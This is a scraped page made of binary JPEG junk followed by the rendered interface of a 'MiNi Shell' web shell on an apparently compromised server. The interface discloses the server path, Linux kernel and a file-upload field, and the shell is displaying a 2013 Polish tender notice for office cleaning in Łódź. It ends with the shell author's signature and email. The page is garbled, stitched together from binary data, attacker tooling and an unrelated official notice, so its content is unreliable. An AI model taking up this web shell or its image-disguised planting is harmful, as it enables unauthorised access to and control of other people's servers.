JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131220/278437-N-2013.html

<p class="kh_header"><b>Łódź: Usługi kompleksowego utrzymania czystości pomieszczeń biurowych w budynkach administracyjnych stanowiących siedziby Zamawiającego w podziale na trzy części.</b><br>
<b>Numer ogłoszenia: 278437 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.gorna.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi kompleksowego utrzymania czystości pomieszczeń biurowych w budynkach administracyjnych stanowiących siedziby Zamawiającego w podziale na trzy części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi w zakresie utrzymania 
    czystości pomieszczeń biurowych w budynkach administracyjnych stanowiących siedziby 
    Zamawiającego.
2. Przedmiot zamówienia został podzielony na 3 (trzy) części:
 1) Część nr 1 
     Usługi w zakresie sprzątania - utrzymania czystości pomieszczeń biurowych w budynku 
     administracyjnym przy ul. Lubelskiej 9/11,  o łącznej powierzchni: 1 037,33m2.
    Szczegółowy zakres i częstotliwość wykonywania czynności określony został w załączniku  
    nr 7 do SIWZ.
  
2)  Część nr 2
    Usługi w zakresie sprzątania - utrzymania czystości pomieszczeń biurowych w dwóch budynkach 
    administracyjnych przy ul. Ciasnej 19a,  o łącznej powierzchni: 645,80m2,
                                           ul. Cieszyńskiej 43, o łącznej powierzchni: 120,13m2,
       Szczegółowy zakres i częstotliwość wykonywania czynności określony został w załączniku  
    nr 7 do SIWZ.
 
3)  Część nr 3
    Usługi w zakresie sprzątania - utrzymania czystości pomieszczeń biurowych w budynku 
    administracyjnym przy ul. Paderewskiego 47, o łącznej powierzchni: 610,58m2
    Szczegółowy zakres i częstotliwość wykonywania czynności określony został w załączniku   
    nr 7 do SIWZ.

3. Zamawiający w przedmiocie zamówienia wymaga od Wykonawcy:
  1) Wykonywania czynności określonych w załącznikach w dni robocze po godzinach pracy    
       Zamawiającego: 
       poniedziałek, środa, czwartek, piątek w godzinach:  15:00 - 19:00,
       wtorek w godzinach: 17:00 - 20:00.
2) Wykonywania czynności w zakresie: opróżniania koszy na śmieci i wykładania ich workami 
    foliowymi, zamiatania i mycia podłóg (wykładziny PCV i posadzki), odkurzania wykładzin 
    dywanowych, usuwanie kurzu z powierzchni meblowych i ścian, mycia urządzeń sanitarnych i 
    kuchennych, mycia ścian licowanych glazurą, mycia ścian malowanych farbą olejną oraz 
    kaloryferów, mycia koszy na śmieci, mycia parapetów, mycia stolarki okiennej i drzwiowej, mycia      
    lamp oświetleniowych (przy wyłączonym zasilaniu elektrycznym), prania firan i zasłon (zdjęcie i 
    zawieszenie), pomieszczeniach WC: kontroli zużycia i ewentualnej wymiany kostek zapachowych 
    w muszlach sedesowych i pisuarach, kontroli i uzupełniania płynnego mydła antybakteryjnego w     
    w dozownikach umocowanych na ścianie, kontroli i uzupełniania papieru toaletowego 
    dwuwarstwowego. 
3) Wykonywania czynności w zakresie: sprzątania świetlicy (sali konferencyjnej) przy 
     ul. Lubelskiej 9/11po naradach w tym: mycie talerzy i szklanek. 
  4) Wykonywania czynności w zakresie: sprzątania pomieszczeń po remontach bez dodatkowego 
       wynagrodzenia.
  5) Zachowania tajemnicy wszelkich informacji dotyczących działalności Zamawiającego w 
       szczególności dotyczących systemu zabezpieczeń, przedmiotów i urządzeń znajdujących się w 
      pomieszczeniach, o których dowiedział się w trakcie realizacji umowy, jak również do      
      pozostawienia w stanie nienaruszonym wszelkich materiałów, z którymi z racji wykonywania 
      umowy mógłby się zetknąć. 
6) Zamykania drzwi zewnętrznych i załączania systemów alarmowych w budynkach,  z wyjątkiem 
     ul. Lubelskiej 9/11.
   4. Czynności wymienione w pkt. 3 wykonawca będzie wykonywał przy pomocy własnych 
        pracowników, własnego sprzętu i  narzędzi oraz własnych materiałów tym także środków 
        czystościowych (m.in. mydło w płynie, kostki wc, papier toaletowy, worki foliowe na śmieci - 
        koszt ich zakupu obciąża Wykonawcę, należy wliczyć w cenę usługi sprzątania) 
5. Zamawiający zaleca,  aby Wykonawcy dokonali wizji lokalnej, uwzględniającej specyfikę 
     sprzątanych pomieszczeń jak i ich wyposażenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o których  mowa 
     w art. 22 ust. 1 Ustawy, który dotyczy:
a)  posiadania wiedzy i doświadczenia,
     Zamawiający żąda od Wykonawcy udokumentowania wiedzy i doświadczenia poprzez wykazanie 
     w zał. nr 2 do SIWZ wykonanych usług lub usług w trakcie realizacji w okresie ostatnich trzech 
     lat przed upływem terminu składania ofert, a  jeżeli okres działalności jest krótszy - w tym okresie, 
     odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia lub podobnym  z 
     podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, w ilości:  minimum jednej usługi 
     w zakresie sprzątania pomieszczeń  biurowych (trwającej minimum 12 miesięcy),  o wartości 
     brutto co najmniej  do wysokości składanej oferty oraz załączeniem dokumentów - dowodów 
     potwierdzających, że wykazane  przez Wykonawcę usługi zostały wykonane lub są wykonywane 
     należycie.
     Dla usług będących w trakcie realizacji należy załączyć kserokopie podpisanej umowy  
     z informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie    
     może być niższa niż kwota określona powyżej.   
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
     Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa  
     w art. 22 ust. 1 Ustawy, który dotyczy:
  a) dysponowania osobami zdolnymi do wykonania zamówienia;
      Zamawiający żąda od Wykonawcy wykazania w zał. nr 3 do SIWZ  wykazu osób, które będą 
      uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych  za świadczenie 
      usług. Zamawiający wymaga, minimum dwóch osób dla każdej części postępowania.
      Wykonawca jest zobowiązany do przekazania Zamawiającemu informacji, o każdorazowej 
      personalnej zmianie osób, którym powierzył wykonanie zamówienia 
      Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
      Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa 
     w art. 22 ust.1 Ustawy, który dotyczy:
 a) sytuacji ekonomicznej i finansowej,
     Zamawiający żąda od Wykonawcy,  posiadania ubezpieczenia od odpowiedzialności 
     cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną
     kwotę na sumę ubezpieczenia minimum na kwotę stanowiącą 100% ceny oferty (brutto).
     W celu potwierdzenia spełnienia wskazanego warunku wykonawca przedstawia polisę wraz z 
     dowodem jej opłacenia lub inny dokument w sposób nie budzący wątpliwości potwierdzający    
     objęcie ochroną ubezpieczeniową. 
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AZK Łódź-Górna, 93-129 Łódź,ul. Lubelska 9/11, pokój nr 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 09:00, miejsce: AZK Łódź-Górna, 93-129 Łódź,ul. Lubelska 9/11, pokój nr 6 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com